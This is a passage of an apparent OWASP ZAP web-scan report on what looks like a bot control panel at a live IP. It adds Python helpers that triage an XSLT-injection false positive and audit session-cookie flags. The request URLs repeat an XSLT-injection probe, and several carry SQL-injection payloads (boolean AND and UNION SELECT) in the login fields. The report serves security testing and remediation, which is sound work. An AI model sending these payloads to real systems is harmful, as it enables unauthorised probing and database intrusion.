| Request Header - size: 404 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Capture.PNG |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 482 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Sound%20Effects |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 300 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 496 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/error.wav |
| Method | GET |
| Parameter | Sound Effects |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 715 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?bot=DESKTOP-95IQEEV |
| Method | GET |
| Parameter | gate.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 667 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54 |
| Method | GET |
| Parameter | Bots.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 756 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54 |
| Method | GET |
| Parameter | dashboard.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 860 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?id=54 |
| Method | GET |
| Parameter | tasks_page.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 756 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 806 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | 327qi |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 288 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects |
| Method | GET |
| Parameter | 327qi |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 490 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | 327qi |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 500 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | Sound Effects |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 480 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/error.wav |
| Method | GET |
| Parameter | Sound Effects |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 490 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | host |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 386 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | GET |
| Parameter | error.wav |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 496 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | host |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 788 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | host |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 743 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/login.php/327qi |
| Method | POST |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 297 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/tasks_page.php |
| Method | POST |
| Parameter | TQUIA729JAULAMJS |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 529 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E |
| Method | POST |
| Parameter | tasks_page.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 531 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/%3Cxsl:value-of%20select=%22system-property('xsl:vendor')%22%2F%3E/327qi |
| Method | POST |
| Parameter | login.php |
| Attack | <xsl:value-of select="system-property('xsl:vendor')"/> |
| Evidence | Apache |
| Request Header - size: 304 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| Instances | 45 |
| Solution | Validate and sanitize every user-supplied value before it reaches an XSLT processor, and never assemble a stylesheet from request input. Confirm the finding before remediating: every instance above returned a 301- or 325-byte body, the same size as the Apache/2.4.58 error pages reported in the banner-leak finding later on this page, which strongly suggests the scanner matched "Apache" in the server signature of a default 404 page rather than in the output of system-property('xsl:vendor'). Treat the finding as unconfirmed until a payload-free request to the same URL returns a different body. |
| Reference | https://www.contextis.com/blog/xslt-server-side-injection-attacks |
| Tags | OWASP_2021_A03, OWASP_2017_A01 |
| CWE Id | 91 |
| WASC Id | 23 |
| Plugin Id | 90017 |
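Before treating the 45 instances as a confirmed XSLT injection, compare each payload response with a payload-free baseline request to the same URL. A real hit echoes the vendor string of the XSLT engine (libxslt for PHP's XSLTProcessor, "Apache Software Foundation" for Xalan), whereas a default httpd error page contains "Apache" in its `<address>` footer. The triage helper below is an added example, not part of the scan report or the panel's code; the vendor-string list, the signature regex and the sample 404 page are assumptions modelled on the httpd 2.4 default template and the versions the scan fingerprinted.

```python
import re
from dataclasses import dataclass
from typing import List

# Values real XSLT engines return for system-property('xsl:vendor'). A true positive echoes
# one of these; a bare "Apache" is not among them. (Assumed list, not from the report.)
XSLT_VENDOR_STRINGS = (
    "libxslt",                     # PHP XSLTProcessor, lxml
    "Apache Software Foundation",  # Xalan
    "Saxonica",                    # Saxon
    "Microsoft",                   # MSXML / .NET
)

# httpd writes its signature into an <address> element of every generated error page
# when ServerSignature is On.
SERVER_SIGNATURE_RE = re.compile(
    r"<address>\s*Apache/[\d.]+[^<]*Server at[^<]*</address>", re.IGNORECASE
)


@dataclass
class Verdict:
    label: str    # "true-positive", "false-positive" or "needs-manual-review"
    reason: str


def triage_xslt_finding(attack_body: str, baseline_body: str, evidence: str) -> Verdict:
    """Classify a scanner XSLT-injection hit by comparing the payload response with a
    payload-free baseline request to the same URL."""
    new_vendor: List[str] = [
        v for v in XSLT_VENDOR_STRINGS if v in attack_body and v not in baseline_body
    ]
    if new_vendor:
        return Verdict("true-positive",
                       f"payload response introduced vendor string {new_vendor[0]!r}")
    signature = SERVER_SIGNATURE_RE.search(attack_body)
    if signature and evidence in signature.group(0):
        return Verdict("false-positive",
                       "evidence sits inside the httpd server signature of an error page")
    if attack_body == baseline_body:
        return Verdict("false-positive", "payload response is byte-identical to the baseline")
    return Verdict("needs-manual-review",
                   "response differs from baseline but shows no vendor string")


# Constructed sample modelled on the httpd 2.4 default 404 template with the version strings
# the scan fingerprinted; this is not a captured response from the target.
NOT_FOUND_PAGE = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n'
    "<html><head>\n<title>404 Not Found</title>\n</head><body>\n"
    "<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n"
    "<address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 142.202.242.172 Port 80</address>\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    # The scanner's situation: payload and baseline both land on the same 404 page.
    print(triage_xslt_finding(NOT_FOUND_PAGE, NOT_FOUND_PAGE, "Apache"))
```

Run the function over each instance with the baseline fetched without the `<xsl:value-of .../>` segment; only a "true-positive" or "needs-manual-review" verdict is worth a manual request with a more distinctive probe such as `system-property('xsl:version')`.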
| Low | Big Redirect Detected (Potential Sensitive Information Leak) |
|---|---|
| Description | The server answered with a redirect whose body is larger than a redirect normally carries. A browser follows the Location header and never renders that body, but any client that does not follow redirects (a proxy, curl, a scanner) can read it, and it may include sensitive details such as PII. |
| URL | http://142.202.242.172/xampp |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 194 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 234 bytes. | |
| Response Body - size: 342 bytes. | |
| Instances | 1 |
| Solution | Ensure that no sensitive information is leaked via redirect responses. Redirect responses should have almost no content. |
| Reference | |
| Tags | OWASP_2021_A04, WSTG-v42-INFO-05, OWASP_2017_A03 |
| CWE Id | 201 |
| WASC Id | 13 |
| Plugin Id | 10044 |
| Low | Cookie No HttpOnly Flag |
|---|---|
| Description | A cookie has been set without the HttpOnly flag, which means that the cookie can be accessed by JavaScript. If a malicious script can be run on this page then the cookie will be accessible and can be transmitted to another site. If this is a session cookie then session hijacking may be possible. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 175 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 379 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 197 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 393 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 209 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 808 bytes. | |
| Request Body - size: 113 bytes. | |
| Response Header - size: 513 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 7 |
| Solution | Ensure that the HttpOnly flag is set for all cookies. |
| Reference | https://owasp.org/www-community/HttpOnly |
| Tags | OWASP_2021_A05, WSTG-v42-SESS-02, OWASP_2017_A06 |
| CWE Id | 1004 |
| WASC Id | 13 |
| Plugin Id | 10010 |
| Low | Cookie without SameSite Attribute |
|---|---|
| Description | A cookie has been set without the SameSite attribute, which means that the cookie can be sent as a result of a cross-site request. The SameSite attribute is an effective countermeasure to cross-site request forgery, cross-site script inclusion, and timing attacks. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 175 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 181 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 379 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 197 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 393 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP |
| Method | GET |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 209 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 372 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | PHPSESSID |
| Attack | |
| Evidence | Set-Cookie: PHPSESSID |
| Request Header - size: 808 bytes. | |
| Request Body - size: 113 bytes. | |
| Response Header - size: 513 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 7 |
| Solution | Ensure that the SameSite attribute is set to either 'lax' or ideally 'strict' for all cookies. |
| Reference | https://tools.ietf.org/html/draft-ietf-httpbis-cookie-same-site |
| Tags | OWASP_2021_A01, WSTG-v42-SESS-02, OWASP_2017_A05 |
| CWE Id | 1275 |
| WASC Id | 13 |
| Plugin Id | 10054 |
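Both cookie findings concern the same PHPSESSID cookie, which the instances show being issued on every request that reaches login.php, including unauthenticated ones and ones with trailing path info such as `/327qi/Capture.PNG`, so the session is started before any credential check. The audit below is an added example, not the scanner's or the panel's code; the Set-Cookie values are constructed, and the first mirrors PHP's default session cookie, which carries only a path attribute.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class Cookie:
    name: str
    value: str
    httponly: bool = False
    secure: bool = False
    samesite: Optional[str] = None          # normalised to lower case
    other: Dict[str, str] = field(default_factory=dict)


def parse_set_cookie(header: str) -> Cookie:
    """Parse one Set-Cookie header (with or without the 'Set-Cookie:' prefix)."""
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1]
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key = key.strip().lower()
        if key == "httponly":
            cookie.httponly = True
        elif key == "secure":
            cookie.secure = True
        elif key == "samesite":
            cookie.samesite = val.strip().lower() or None
        else:
            cookie.other[key] = val.strip()
    return cookie


def audit_set_cookie(header: str, served_over_https: bool) -> List[str]:
    """Return the weaknesses a reviewer should flag for this cookie, in a fixed order."""
    c = parse_set_cookie(header)
    issues: List[str] = []
    if not c.httponly:
        issues.append("missing HttpOnly")
    if c.samesite not in ("lax", "strict"):
        issues.append("SameSite not Lax or Strict")
    if c.samesite == "none" and not c.secure:
        # Browsers drop SameSite=None cookies that are not also Secure.
        issues.append("SameSite=None without Secure is rejected by browsers")
    if served_over_https and not c.secure:
        issues.append("missing Secure")
    return issues


# Constructed header values (not captured from the target). The first is what PHP emits with
# its default session.cookie_* settings; the second is the hardened form.
DEFAULT_PHP_SESSION = "Set-Cookie: PHPSESSID=6f1c0e1a9b8d; path=/"
HARDENED_SESSION = "Set-Cookie: PHPSESSID=6f1c0e1a9b8d; path=/; HttpOnly; Secure; SameSite=Strict"

if __name__ == "__main__":
    # The panel is served over plain HTTP, so Secure is not yet applicable to it.
    print(audit_set_cookie(DEFAULT_PHP_SESSION, served_over_https=False))
    print(audit_set_cookie(HARDENED_SESSION, served_over_https=True))
```

On the PHP side the equivalent fix is in php.ini: `session.cookie_httponly = 1`, `session.cookie_samesite = "Strict"` (or `"Lax"`), and `session.cookie_secure = 1` once the panel is served over TLS; calling `session_set_cookie_params()` with the same options before `session_start()` achieves this per script.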
| Low | Cross-Domain JavaScript Source File Inclusion |
|---|---|
| Description | The page includes one or more script files from a third-party domain. A script loaded from another origin runs with the full privileges of the including page, so a compromise of that origin, or of the path to it, becomes a compromise of the application. |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | https://cdn.jsdelivr.net/npm/chart.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/chart.js"></script> |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 366 bytes. | |
| Response Body - size: 17,675 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://code.jquery.com/jquery-3.5.1.slim.min.js |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 301 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://code.jquery.com/jquery-3.5.1.slim.min.js |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 289 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 200 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js |
| Attack | |
| Evidence | <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | https://code.jquery.com/jquery-3.5.1.slim.min.js |
| Attack | |
| Evidence | <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd |
| Method | GET |
| Parameter | https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js |
| Attack | |
| Evidence | <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script> |
| Request Header - size: 1,173 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 219 bytes. | |
| Response Body - size: 3,435 bytes. | |
